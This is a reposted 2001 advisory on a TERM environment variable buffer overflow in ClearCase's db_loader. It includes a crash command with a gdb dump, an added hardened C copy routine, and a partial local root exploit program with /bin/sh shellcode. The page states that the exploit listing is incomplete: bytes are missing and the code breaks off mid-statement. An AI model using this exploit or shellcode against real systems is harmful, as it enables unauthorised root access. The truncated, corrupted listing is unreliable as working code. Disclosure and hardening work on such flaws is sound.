[Hands-on] ClearCase DB_Loader

xiaoxiao 2021-03-06

ClearCase DB_Loader environment variable overflow vulnerability

Created: 2001-11-10
Article type: Original
Source: http://xfocus.org
Submitted by: Inburst (Inburst_at_263.net)

Publication information
-----------------------
Discovery date: August 2001
Announcement date: November 1, 2001
Discovered by: Virtualcat@xfocus.org
Website: http://xfocus.org

Brief description
-----------------
Rational's software configuration management tool ClearCase is mainly used in Windows and UNIX development environments. ClearCase provides comprehensive configuration management features, including version control, workspace management, build management and process control, without requiring software developers to change their existing environment, tools or way of working. The administrative tool set includes a db_loader program that is installed by default. When it is run with an over-long "TERM" environment variable, a buffer overflow occurs, which may allow the system to be compromised.

Affected software versions and platforms
----------------------------------------
Affected versions: ClearCase 3.2, 4.0, 4.1
Affected systems: Linux, Solaris SPARC, Solaris x86, AIX, HP, Digital, IRIX, SCO, etc.

Details
-------
Setting TERM to 550 bytes of 'A' (0x41) and running db_loader crashes it; the core dump below was taken on Solaris SPARC, where the saved register windows (l0-l7, i0-i7, fp and the return address i7) are all overwritten with 0x41414141:

    $ TERM=`perl -e 'print "A"x550'`
    $ export TERM
    $ /usr/atria/etc/db_loader
    Bus error
    $ gdb db_loader core -q
    (no debugging symbols found)...
    Core was generated by `./db_loader'.
    Cannot access memory at address 0xffffffffff3e1b80
    #0  0xf0db8 in imsg_fputs ()
    (gdb) bt
    #0  0xf0db8 in imsg_fputs ()
    Cannot access memory at address 0x41414179
    (gdb) i reg
    g0      0x0         0
    g1      0x7b000     503808
    g2      0x13cf84    1298308
    g3      0x0         0
    g4      0xf6c2c     1010732
    g5      0x0         0
    g6      0x0         0
    g7      0x143d58    1326424
    o0      0xffffffff  -1
    o1      0x1         1
    o2      0xffbef054  -4263852
    o3      0xf0c3c     986172
    o4      0xffbeed8a  -4264566
    o5      0xffffffff  -1
    sp      0xffbeef70  -4264080
    o7      0xf0db0     986544
    l0      0x41414141  1094795585
    l1      0x41414141  1094795585
    l2      0x41414141  1094795585
    l3      0x41414141  1094795585
    l4      0x41414141  1094795585
    l5      0x41414141  1094795585
    l6      0x41414141  1094795585
    l7      0x41414141  1094795585
    i0      0x41414141  1094795585
    i1      0x41414141  1094795585
    i2      0x41414141  1094795585
    i3      0x41414141  1094795585
    i4      0x41414141  1094795585
    i5      0x41414141  1094795585
    fp      0x41414141  1094795585
    i7      0x41414141  1094795585
    y       0x0         0
    psr     0xfe801007  -25161721  icc:N---, pil:0, s:0, ps:0, et:0, cwp:7
    wim     0x0         0
    tbr     0x0         0
    pc      0xf0db8     986552
    npc     0xf0dbc     986556
    fpsr    0x0         0  RD:N, TEM:0, NS:0, Ver:0, FTT:0, QNE:0, fcc:=, AEXC:0, CEXC:0
    cpsr    0x0         0
    (gdb)

A local user can gain superuser privileges through this vulnerability.
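The bug class behind the crash above is an unbounded copy of an environment value into a fixed-size stack buffer. The following is an added illustration written for this page, not code from xfocus, Rational or db_loader itself: the vulnerable copy pattern next to a hardened version that bounds the length and rejects implausible terminal names. The 64-byte buffer size, the function names and the character rule are assumptions of this example; the advisory does not say how large db_loader's real buffer is.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed fixed buffer size for this example; the advisory does not state
 * how large db_loader's own buffer is. */
#define TERM_BUF_LEN 64

/* The vulnerable pattern: copy an attacker-controlled environment value into
 * a fixed-size buffer with no length check. A value longer than
 * TERM_BUF_LEN - 1 bytes runs off the end of term[] and overwrites whatever
 * follows it on the stack (saved registers, return address), which is the
 * class of bug the advisory describes. Kept only as the "before" form; it is
 * never called with untrusted input in this program. */
void copy_term_unsafe(const char *value, char term[TERM_BUF_LEN])
{
    strcpy(term, value);
}

/* Hardened form: bound the length before copying and reject values that are
 * not plausible terminal names (terminfo names are printable ASCII with no
 * spaces). Returns 1 when the value was accepted and copied, 0 otherwise;
 * term[] is left untouched on rejection. */
int copy_term_safe(const char *value, char term[TERM_BUF_LEN])
{
    size_t n = 0;
    size_t i;

    if (value == NULL)
        return 0;
    /* Bounded length scan: stop as soon as the value could not fit. */
    while (n < TERM_BUF_LEN && value[n] != '\0')
        n++;
    if (n == 0 || n >= TERM_BUF_LEN)
        return 0;                   /* empty, or needs >= TERM_BUF_LEN bytes */
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)value[i];
        if (c <= 0x20 || c >= 0x7f) /* control, space or non-ASCII byte */
            return 0;
    }
    memcpy(term, value, n + 1);     /* n + 1 <= TERM_BUF_LEN, so this fits */
    return 1;
}

/* Does the hardened copy accept this value? 1 = yes, 0 = no. */
int accepts_term(const char *value)
{
    char term[TERM_BUF_LEN];
    return copy_term_safe(value, term);
}

/* Builds a constructed value of `len` 'A' bytes, the same shape as the
 * 550-byte TERM from the advisory's crash, and reports whether the hardened
 * copy rejects it (1 = rejected, 0 = accepted, -1 = allocation failure). */
int overlong_term_is_rejected(size_t len)
{
    char term[TERM_BUF_LEN];
    char *value = malloc(len + 1);
    int rejected;

    if (value == NULL)
        return -1;
    memset(value, 'A', len);
    value[len] = '\0';
    rejected = !copy_term_safe(value, term);
    free(value);
    return rejected;
}

int main(void)
{
    const char *env = getenv("TERM");
    char term[TERM_BUF_LEN];

    if (copy_term_safe(env, term))
        printf("TERM accepted: %s\n", term);
    else
        printf("TERM rejected (unset, empty, too long, or has bad bytes)\n");
    printf("550-byte value rejected: %d\n",
           overlong_term_is_rejected(550));
    return 0;
}
```

The defensive point is that the check happens before any byte is written: a value of exactly TERM_BUF_LEN bytes or more is refused outright rather than truncated, so no partial copy can leave the buffer unterminated, and the character rule catches values that are short enough but still not a terminal name.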

Test program
------------
ClearCase_x86exp.c (the listing as reproduced here is incomplete: several shellcode bytes are missing and the source breaks off before the end of main):

    /*
     * Rational ClearCase TERM environment variable buffer overflow exploit
     * tested against solaris x86 7, bug found by virtualcat@xfocus.org
     * xploit by xundi@xfocus.org
     * website: http://xfocus.org
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define RET_DIS          550
    #define NOP              0x90
    #define NNOP             512
    #define ENV_VAR          "TERM"
    #define USER_UPPER_MAGIC 0x08047fff

    /* shell code taken from pablo sor's "mailx -F" exploit code */
    char shellcode[] =
        "\xeb\x48\x9a\xff\xff\xff\x5e\x31\xc0\x89\x46\xb4"
        "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xdf"
        "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
        "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
        "\xb0\x3b\xe8\xbb\xff\x0c\xe8\xbb\xff\xff\xff\x2f"
        "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

    int get_esp()
    {
        __asm__("movl %esp, %eax");
    }

    int getEnvAddr(const char *envPtr)
    {
        int   envAddr = 0;
        int   retCode = 0;
        char *charPtr = (char *)get_esp();

        /* Search for the starting address of the environment string for
         * the specified environment variable */
        while ((unsigned int)charPtr++ < USER_UPPER_MAGIC) {
            retCode = memcmp((unsigned char *)charPtr, envPtr, 4);
            /* Found */
            if (retCode == 0) {
                envAddr = (int)(charPtr - 1);
                break;
            }
        }
        return envAddr;
    }

    int main(int argc, char **argv)
    {
        char  buff[256] = {0};
        char *buffPtr = NULL;
        char *charPtr = NULL;
        int  *intPtr = NULL;
        int   retAddr = 0;
        int   retValue = 0;
        int   buffLen = 0;
        int   adjustment = 0;
        int   strLen = 0;
        int   alignment = 0;
        int   diff = 0;
        int   i;
        int   shellcodeLen = strlen(shellcode);

        if (argc == 2) {
            adjustment = atoi(argv[1]);
        }
        buffLen = strlen(ENV_VAR) + RET_DIS + NNOP + shellcodeLen + 1;
        charPtr = getenv(ENV_VAR);

        /* Adjust the stupid alignment */
        strLen = strlen(charPtr) + 1;
        alignment = strLen % 4;
        if (alignment != 0) {
            alignment = 4 - alignment;
            strLen += alignment;
        }
        alignment = buffLen % 4;
        if (alignment != 0) {
            alignment = 4 - alignment;
            buffLen += alignment;
        }
        retValue = getEnvAddr(ENV_VAR);
        diff = buffLen - strLen;
        retAddr = retValue - diff + strlen(ENV_VAR) + 1;
        alignment = retAddr % 4;
        if (alignment != 0) {
            alignment = 4 - alignment;
        }
        retAddr += RET_DIS + alignment + adjustment;

        /* Allocate memory for the evil buffer */
        buffPtr = (char *)malloc(buffLen);
        if (buffPtr != NULL) {
            strcpy(buffPtr, ENV_VAR);
            strcat(buffPtr, "=");
            charPtr = (char *)(buffPtr + strlen(buffPtr));
            /* Fill the rest of the buffer with 'A' */
            memset(charPtr, 0x41, buffLen - strlen(buffPtr) - 4);
            /* Put in the return address */
            intPtr = (int *)
            *intPtr = retAddr;

Please credit the original source when reposting: https://www.9cbs.com/read-40838.html
